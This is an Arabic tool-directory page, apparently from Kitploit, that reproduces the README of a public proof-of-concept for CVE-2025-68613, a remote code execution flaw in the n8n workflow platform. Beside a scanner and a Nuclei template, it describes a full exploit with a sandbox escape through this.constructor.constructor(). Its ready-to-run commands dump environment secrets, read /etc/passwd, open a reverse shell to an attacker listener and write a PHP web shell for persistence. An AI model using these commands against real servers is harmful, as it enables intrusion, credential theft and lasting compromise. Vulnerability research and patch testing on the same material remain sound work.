Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-68613-POC — PoC عام + ماسح ضوئي وبحث لـ CVE-2025-68613: ثغرة RCE حرجة في أتمتة سير العمل n8n عبر حقن التعبيرات (CVSS 10.0). يتضمن أدوات كشف، واستغلالًا كاملًا، وإرشادات المعالجة. | Kitploit
أدوات/GitHubGitHub/thestingr/cve-2025-68613-poc
الاستطلاعماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالأوراق والأبحاثالتعلم والتعليمالفريق الأحمرتطوير الحمولات
2622منذ 9 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
thestingr/cve-2025-68613-poc

CVE-2025-68613-POC

PoC عام + ماسح ضوئي وبحث لـ CVE-2025-68613: ثغرة RCE حرجة في أتمتة سير العمل n8n عبر حقن التعبيرات (CVSS 10.0). يتضمن أدوات كشف، واستغلالًا كاملًا، وإرشادات المعالجة.

عرض المستودع

🚨 CVE-2025-68613: ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) حرجة في n8n

Language: Python CVSS Score: 10.0 Critical Exploit Status: Proof of Concept Available CVE Status: CVE-2025-68613 Disclosed Version: v1.0.2 Target Platform: n8n

CVE-2025-68613 PoC - TechSquad RedTeam

جدول المحتويات

  1. نظرة عامة
  2. ما هي n8n؟
  3. أساسيات الثغرة
  4. التفاصيل التقنية
  5. النسخ المتأثرة
  6. آلية الاستغلال
  7. الأثر الواقعي
  8. طرق الكشف
  9. المعالجة والتخفيف
  10. الموارد والمراجع

نظرة عامة

CVE-2025-68613 هي ثغرة حرجة في تنفيذ التعليمات البرمجية عن بُعد (RCE) اكتُشفت في n8n، وهي منصة أتمتة سير عمل مفتوحة المصدر وشائعة. تسمح هذه الثغرة للمستخدمين المصادَق عليهم بتنفيذ تعليمات برمجية عشوائية على الخادم، مما قد يؤدي إلى اختراق النظام بالكامل.

حقائق سريعة

  • معرّف CVE: CVE-2025-68613
  • درجة CVSS: 9.9 - 10.0 (حرجة)
  • نوع الثغرة: حقن تعبير → تنفيذ تعليمات برمجية عن بُعد
  • CWE: CWE-913 (تحكم غير سليم في موارد التعليمات البرمجية المُدارة ديناميكيًا)
  • متجه الهجوم: الشبكة
  • مصادقة مطلوبة: نعم (صلاحية منخفضة - لا حاجة لوصول المسؤول) |- الحالة: يتوفر إثبات المفهوم (تم التحقق من عمله على v1.121.0)

ما هي n8n؟

n8n هي منصة أتمتة سير عمل مفتوحة المصدر تتيح للمستخدمين:

  • ربط مختلف واجهات برمجة التطبيقات (APIs) وقواعد البيانات والخدمات
  • أتمتة العمليات التجارية المتكررة
  • إنشاء سير عمل معقدة دون الحاجة إلى برمجة مكثفة
  • النشر محليًا (On-premises) أو في السحابة

لماذا تُعد n8n بنية تحتية حرجة؟

تستخدم المؤسسات n8n من أجل:

  • دمج قواعد البيانات مع الخدمات السحابية
  • أتمتة خطوط معالجة البيانات
  • ربط أنظمة إدارة علاقات العملاء (CRMs) وأنظمة تخطيط موارد المؤسسة (ERPs) والأنظمة الداخلية
  • إدارة البيانات الحساسة وبيانات اعتماد واجهات برمجة التطبيقات

هذا الدور المحوري في البنية التحتية لتقنية المعلومات يجعل الثغرات خطيرة بشكل خاص، إذ يمكنها أن تمنح المهاجمين وصولًا إلى الشبكات بالكامل والبيانات الحساسة.


الأدوات في هذا المستودع

يتضمن هذا المستودع أدوات جاهزة للاستخدام لاختبار اكتشاف الثغرات والاستغلال:

1. الماسح الضوئي: cve-2025-68613-scanner.py

الغرض: اكتشاف آمن وغير استغلالي لنسخ n8n الضعيفة

الميزات:

  • الكشف السلبي عن الإصدار من استجابات HTTP
  • لا يتطلب مصادقة
  • لا ينفّذ حمولات
  • يفحص عدة مسارات شائعة (/, /rest/settings, /healthz, /api/v1/health)
  • آمن لتقييمات الأمان المصرح بها

الاستخدام:```bash python3 cve-2025-68613-scanner.py -u http://target:5678

**المخرجات**:
- رمز الخروج 0: غير مُعرَّض للثغرة
- رمز الخروج 1: الإصدار غير محدد (قد يكون مُصحَّحًا أو مخفيًا)
- رمز الخروج 2: تم اكتشاف إصدار مُعرَّض للثغرة

### 2. قالب Nuclei: `CVE-2025-68613.yaml`
**الغرض**: اكتشاف الثغرات تلقائيًا واختبار تقييم التعبيرات الأساسي

**الميزات**:
- يتطلب رمز مصادقة صالحًا
- يختبر قدرة حقن التعبيرات
- يحاول قراءة السياق العام لـ Node.js (process.platform)
- ينشئ سير عمل اختبارية للتحقق من ناقل RCE (تنفيذ الأوامر عن بُعد)
- تصنيف الخطورة حرج وفقًا لـ CVSS 10.0

**الاستخدام**:```bash
# Single target with known token
nuclei -t CVE-2025-68613.yaml -u http://target:5678 -v

# Multiple targets
nuclei -t CVE-2025-68613.yaml -l targets.txt

3. الاستغلال الكامل: exploit_cve-2025-68613.py

الغرض: إثبات مفهوم كامل للاستغلال مع حمولات هجوم متعددة

الميزات:

  • معالجة كاملة للمصادقة
  • حمولات استغلال متعددة:
    • info: جمع معلومات النظام (نظام التشغيل، البنية المعمارية، إصدار Node.js، المستخدم الحالي)
    • cmd: تنفيذ أوامر نظام تعسفية
    • env: استخراج جميع متغيرات البيئة (تكشف بيانات الاعتماد، مفاتيح API، الأسرار)
    • read: قراءة ملفات حساسة من نظام الملفات (مفاتيح SSH، ملفات الإعدادات، إلخ.)
    • write: كتابة ملفات إلى نظام الملفات (الاستمرارية، الباب الخلفي، إلخ.)
    • revshell: إنشاء اتصال ريفيرس شل للوصول التفاعلي
  • تنظيف سير العمل تلقائيًا
  • معالجة الأخطاء والإبلاغ عن الحالة

المتطلبات:

  • بيانات اعتماد مستخدم n8n صالحة (بريد إلكتروني/كلمة مرور)
  • Python 3.6+ مع مكتبة requests
  • وصول شبكي إلى مثيل n8n الهدف

التثبيت:```bash pip install requests chmod +x exploit_cve-2025-68613.py

**أمثلة الاستخدام**:```bash
# Gather system information
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload info

# Execute system command (whoami)
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload cmd --command "whoami"

# Extract all environment variables (credentials, API keys)
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload env

# Read sensitive files
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload read --file "/etc/passwd"

# Establish reverse shell (requires netcat listener)
# On attacker machine: nc -lvnp 4444
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload revshell --lhost 10.10.14.5 --lport 4444

# Write a web shell for persistence
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload write \  
  --file "/tmp/shell.php" --content '<?php system($_GET["cmd"]); ?>'

كيف يعمل:

  1. يتحقق من المصادقة إلى n8n باستخدام بيانات الاعتماد المقدمة
  2. ينشئ سير عمل خبيث يحتوي على حمولة حقن تعبيرات
  3. تخرج الحمولة من صندوق رمل التعبيرات باستخدام this.constructor.constructor()
  4. ينفذ الحمولة عبر process.platform أو واجهات برمجة تطبيقات Node.js الأخرى
  5. يسترجع النتائج من تنفيذ سير العمل
  6. يقوم بالتنظيف عن طريق حذف سير عمل الاختبار

رموز الخروج:

  • 0: نجاح الاستغلال
  • 1: فشل المصادقة أو الاستغلال

أساسيات الثغرة

ما هي المشكلة؟

بعبارات بسيطة: يتيح n8n للمستخدمين كتابة تعبيرات في سير العمل لمعالجة البيانات ديناميكيًا. ومع ذلك، يتم تقييم هذه التعبيرات دون عزل مناسب، مما يسمح للمهاجمين بالخروج من سياق التنفيذ المقصود وتنفيذ تعليمات برمجية عشوائية على الخادم.

المشكلة الأساسية

عند إنشاء سير عمل في n8n، يمكنك استخدام "التعبيرات" لمعالجة البيانات. يُفترض أن تعمل هذه التعبيرات في بيئة مقيدة. ومع ذلك، تُظهر الثغرة أن هذه التعبيرات يمكنها الوصول إلى النظام الأساسي، مما يسمح للمهاجم بـ:

  1. تنفيذ أوامر النظام
  2. قراءة/كتابة الملفات على الخادم
  3. سرقة متغيرات البيئة (مفاتيح API، كلمات المرور، الأسرار)
  4. تعديل البيانات أو حذفها
  5. تأسيس استمرارية للوصول طويل الأمد

لماذا هي خطيرة للغاية

  • حاجز دخول منخفض: يتطلب فقط تسجيل دخول مستخدم (بدون صلاحيات إدارية خاصة)
  • انتشار واسع: تسمح العديد من المؤسسات للمستخدمين غير التقنيين بإنشاء سير عمل
  • تأثير كبير: يعمل بصلاحيات كاملة لعملية n8n
  • الوصول إلى البيانات: يمكنه الوصول إلى جميع البيانات التي يصل إليها n8n (قواعد البيانات، واجهات برمجة التطبيقات، بيانات الاعتماد)
  • الموقع الشبكي: غالبًا ما يقع n8n في مركز البنية التحتية الحرجة، مما يتيح الحركة الجانبية

التفاصيل الفنية

كيف تعمل الثغرة

تنزيل الأداة